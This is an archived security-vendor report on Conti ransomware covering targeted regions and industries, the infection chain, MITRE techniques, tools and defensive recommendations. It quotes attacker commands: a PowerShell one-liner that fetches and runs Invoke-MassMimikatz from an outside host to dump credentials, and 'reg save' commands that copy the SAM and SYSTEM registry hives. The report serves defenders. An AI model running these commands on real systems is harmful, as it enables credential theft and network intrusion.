Ransomware Spotlight: Conti
Archived: 2026-04-05 15:06:45 UTC
Top affected industries and counties
Conti attacks have been detected all over the globe, with the US amassing over a million attack attempts from January 1 to
November 12, 2021. The Netherlands and Taiwan ranked second and third respectively.
open on a new tab
Figure 1. Countries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)
Source: Trend Micro™ Smart Protection Network™ infrastructure
The retail industry saw the most Conti attack attempts, followed by insurance, manufacturing, and telecommunications.
Healthcare, which Conti operators targeted in high-profile attacksopen on a new tab this year, is sixth on the list.
open on a new tab
Figure 2. Industries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)
Source: Trend Micro™ Smart Protection Network™ infrastructure
Infection chain and techniques
Initial Access
Conti can arrive in the system through BazarLoader, which is delivered via phishing emails containing a Google
Drive link that downloads the malware.
Alternatively, the ransomware can arrive via exploiting the the FortiGate firewall vulnerabilities CVE-2018-
13379open on a new tab and CVE-2018-13374open on a new tab. After successfully exploiting the application, the
ransomware deploys Cobalt Strike to gain a foothold on the system.
Conti can also arrive as a result of the exploitation of the ProxyShell Microsoft Exchange vulnerabilities.
Discovery
For initial reconnaissance, the Conti group uses tools such as Whoami, Nltest, and Net. These tools give the operators
information about where they are in the system, and what rights and permissions they have.
Since the operators employ double extortion tacticsnews- cybercrime-and-digital-threats, they actively look for files
to exfiltrate in the discovery stage. The threat actors use tools such as ShareFinder to identify the shares needed for
exfiltration and ransomware deployment.
Privilege Escalation
Although the group mostly relies on finding the domain admin credentials to gain full access to the domain, they may
also use a couple of exploits like Zerologon (CVE-2020-1472open on a new tab) and PrintNightmare (CVE-2021-
1675open on a new tab), to elevate their privilege and further strengthen their foothold in the network.
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti
Page 1 of 6

Credential Access
The attackers dump cached credentials on systems to allow them to move laterally or elevate their privilege. They use
tools such as ProcDump to dump system process/es (usually lssas.exe) and use it in combination with Mimikatz to
dump credentials.
In other cases, they may use mass-mimikatz, a module from Empire, to dump the credentials on multiple systems.
Mimikatz (mass-mimikatz, from Empire)
C:\WINDOWS\SYSTEM32\WBEM\WMIC.exe /node:localhost process call create powershell /c IEX
(NewObjectNet.WebClient).DownloadString('https://raw.githubusercontent[.]com/PowerShellEmpire/PowerTools/master/PewPewPew/Invo
MassMimikatz.ps1');'24346D,COMPUTERNAME2'|Invoke-MassMimikatz -Verbose > c:/programdata/2.txt
Alternatively, they may also use the kerberoasting module of the PowerShell empire or use tools like Rubeus.
The attackers may also use native Windows tools, such as Task Manager, to dump the memory of lsass or use the
comsvcs DLL file’s MiniDump function.
They also gain access to the credentials by taking them out of password stores.
One of the ways to do this is through “reg save” commands.
- reg save HKLM\SAM C:\programdata\SamBkup.hiv
- reg save HKLM\SYSTEM C:\programdata\FileName.hiv
They can also use tools such as Get-GPPPassword to get plain text passwords stored in the group policy
preference
They can also gain credentials from browsers and cloud applications using tools such as SharpChrome and SeatBelt.
After gaining enough credentials, they use SMBAutoBrute to automate the task of bruteforcing the passwords and
see what password works.
After gaining information on the domain accounts, the attackers then dump the domain controller credentials using
Ntdsutil.
Alternatively, they can also use Vssadmin to create a snapshot of the system and download Ntds.dit to accomplish
this.
Lateral Movement
The attackers can also use batch files to disable security tools. These files are executed through scheduled tasks.
The groups are also known to use third-party tools such as Atera and AnyDesk to control remote systems.
The operators are also known to use EternalBlue to move laterally in the network of systems that are vulnerable to
this exploit.
They also use PSExec to remotely execute scripts and the ransomware itself.
Defense Evasion
Just before the execution of the ransomware, threat actors create a series of batch files to automate the distribution of
its tools in the domain. These tools include scripts to terminate existing security software.
The operators can also use other tools, like GMER, PC Hunter, and PowerShell, to accomplish this.
Execution
Ties to the Trickbot gang gave Conti operators the ability to execute the ransomware via BazarLoader, which leads to
Cobalt Strike, which eventually leads to the ransomware itself.
Once the actors are inside the network, they tend to use scheduled tasks and batch files as a means of execution on
remote systems.
Alternatively, to execute the ransomware the operators can use files such as the DontSleep.exe process, which calls
the task manager where the file can be executed.
Exfiltration
The attackers perform data exfiltration on the system with the use of the Rclone tool, which is an open-source tool
used for syncing files to a specified cloud storage, such as Mega cloud storage.
The group can also use WinSCP to exfiltrate data.
Impact
After exfiltration and distribution of the ransomware to the targeted endpoints, the files are now encrypted using
ChaCha20 with RSA4096 to protect the ChaCha key and nonce.
The ransomware also inhibits system recovery by deleting shadow copies using WMI.
MITRE tactics and techniques
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti
Page 2 of 6

Initial
Access
Execution Persistence
Privilege
Escalation
Credential
Access
Lateral
Movement
Defense Evasion
Command
and Control
E
T1566 -
Phishing
Arrives via
phishing
emails with
BazarLoader
T1190 -
Exploit
public-facing
application
Arrives via
firewall
exploits
(CVE-2018-
13379 and
CVE-2018-
13374)
T1106 -
Execution
through API
Uses native
API to execute
commands
such as
deleting
shadow copies
T1059.003 -
Command and
scripting
interpreter:
Windows
command shell
Uses batch files
to distribute
and execute
ransomware
T1047 -
Windows
Management
Instrumentation
Uses WMI to
execute batch
files and delete
shadow copies
T1204 - User
execution
User execution
is needed to
carry out the
payload from
the spear
phishing link
T1053.005 -
Scheduled
task/job:
scheduled task
Uses scheduled
tasks as a
means of
execution for
the
ransomware
T1053.005
- Scheduled
task/job:
Scheduled
task
Uses
scheduled
tasks as a
means of
execution
for the
ransomware
T1078.002 -
Valid
accounts:
domain
accounts
Uses domain
administrator
accounts to
escalate
privilege in
the system
T1083 - File
and directory
discovery
Searches for
specific files
and directory
related to its
encryption
T1018 -
 Remote
system
discovery
Enumerates
ARP entries to
enable
distribution to
remote systems
T1057 -
Process
discovery
Discovers
certain
processes for
process
termination
T1016 -
 System
network
configuration
discovery
Enumerates
ARP entries to
enable
distribution to
remote systems
T1069.002 -
 Permission
groups
discovery:
domain groups
Searches for
group
information
for privilege
escalation
T1003 - OS
credential
dumping
Dumps LSASS
memory to be
used for
retrieving
password
hashes
T1555 -
Credentials
from
password
stores
Extracts
passwords
from
credential
stores using
tools such as
SharpChrome,
Seatbelt, and
net-GPPPassword
T1552 -
Unsecured
credentials
Retrieves
credentials
using
Mimikatz 
T1570 -
Lateral tool
transfer
Uses
BITSAdmin to
transfer tools
across the
network
T1021.002 -
Remote
services:
SMB/Windows
admin shares
Cobalt Strike
uses admin
shares to
distribute itself
to remote
systems
T1562.001 - Impair
defenses: disable or
modify tools
Terminates certain
security related
software
T1140 -
Deobfuscate/Decode
files or information
Ransomware is
obfuscated to make
detection more
difficult
T1055 - Process
injection
Uses process
injection to make
detection more
difficult
T1071 -
Application
Layer
Protocol
Uses http to
communicate
to its C&C
server
T1219 -
Remote
access
software
Uses RMM
software
such as
AnyDesk and
Atera
T
E
o
se
ex
to
st
Sy
to
sp
c
st
su
M
st
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti
Page 3 of 6

Initial
Access
Execution Persistence
Privilege
Escalation
Credential
Access
Lateral
Movement
Defense Evasion
Command
and Control
E
T1082 -
 System
information
discovery
Logs system
information
for
information on
the system
T1033 -
System
owner/user
discovery
Performs user
discovery for
privilege
escalation
T1012 - Query
registry
Queries
certain
registry for
stored
passwords
T1063 -
Security
software
discovery
Discovers
security
software for
reconnaissance
and
termination
Summary of malware, tools, and exploits used
Security teams can watch out for the presence of the following malware tools, and exploits that are typically used in Conti
attacks:
Initial Entry Execution Discovery Privilege Escalation Credential Access
Lateral
Movement
Defen
Phishing
emails
Firewall
exploits
(CVE-2018-
13379
and
CVE-2018-
13374)
BazarLoader/
BazarBackdoor
Cobalt Strike
DontSleep
Adfind
Net
NetScan
Nltest
ShareFinder
SharpView
PowerUpSQL
Whoami
EternalBlue
(Ms17_010)
Mimikatz
PowerUpSQL
PrintNightmare
(CVE-2021-
1675)
RouterScan
Zerologon
(CVE-2020-
1472)
EComsvcs.dll
Mimikatz
Net-GPPPassword
Ntdsutil
PowerShell
Empire:
Kerberoast
ProcDump
RouterScan
Rubeus
SharpChrome
SMB
AutoBrute
AnyDesk
Atera
BITSAdmin
Cobalt
Strike
EternalBlue
Mimikatz
PsExec
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti
Page 4 of 6

Initial Entry Execution Discovery Privilege Escalation Credential Access
Lateral
Movement
Defen
Task
Manager
Vssadmin
Recommendations
To help defend systems against similar threats, organizations can establish security frameworks, which can allocate
resources systematically for establishing a solid defense against ransomware.
Here are some best practices that can be included in these frameworks:
Audit and inventory
Take an inventory of assets and data
Identify authorized and unauthorized devices and software
Make an audit of event and incident logs
Configure and monitor
Manage hardware and software configurations
Grant admin privileges and access only when necessary to an employee’s role
Monitor network ports, protocols, and services
Activate security configurations on network infrastructure devices such as firewalls and routers
Establish a software allow list that only executes legitimate applications
Patch and update
Conduct regular vulnerability assessments
Perform patching or virtual patching for operating systems and applications
Update software and applications to their latest versions
Protect and recover
Implement data protection, backup, and recovery measures
Enable multifactor authentication
Secure and defend
Employ sandbox analysis for blocking malicious emails
Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and
network
Detect early signs of an attack such as the presence of suspicious toolsnews- cybercrime-and-digital-threats in the
system
Use advanced detection technologies such as those powered by AI and machine learning
Train and test
Regularly train and assess employees on security skills
Do red-team exercises and penetration tests
A multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and
network). Security solutions can detect malicious components and suspicious behavior could help protect enterprises.
Trend Micro Vision One™products provides multilayered protection and behavior detection, which helps block
questionable behavior and tools early on before the ransomware can do irreversible damage to the system.
Trend Micro Cloud One™ Workload Securityproducts protects systems against both known and unknown threats that
exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine
learning. 
Trend Micro™ Deep Discovery™ Email Inspectorproducts employs custom sandboxing and advanced analysis
techniques to effectively block malicious emails, including phishing emails that can serve as entry points for
ransomware.
Trend Micro Apex One™products offers next-level automated threat detection and response against advanced
concerns such as fileless threats and ransomware, ensuring the protection of endpoints.
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti
Page 5 of 6

Indicators of Compromise
HIDE
Like it? Add this infographic to your site:
1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page
(Ctrl+V).
Image will appear the same size as you see above.
We Recommend
The Industrialization of Botnets: Automation and Scale as a New Threat Infrastructurenews article
Complexity and Visibility Gaps in Power Automatenews article
Cracking the Isolation: Novel Docker Desktop VM Escape Techniques Under WSL2news article
Azure Control Plane Threat Detection With TrendAI Vision One™news article
The AI-fication of Cyberthreats: Trend Micro Security Predictions for 2026predictions
Ransomware Spotlight: DragonForcenews article
Stay Ahead of AI Threats: Secure LLM Applications With Trend Vision Onenews article
The Road to Agentic AI: Navigating Architecture, Threats, and Solutionsnews article
Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti
Page 6 of 6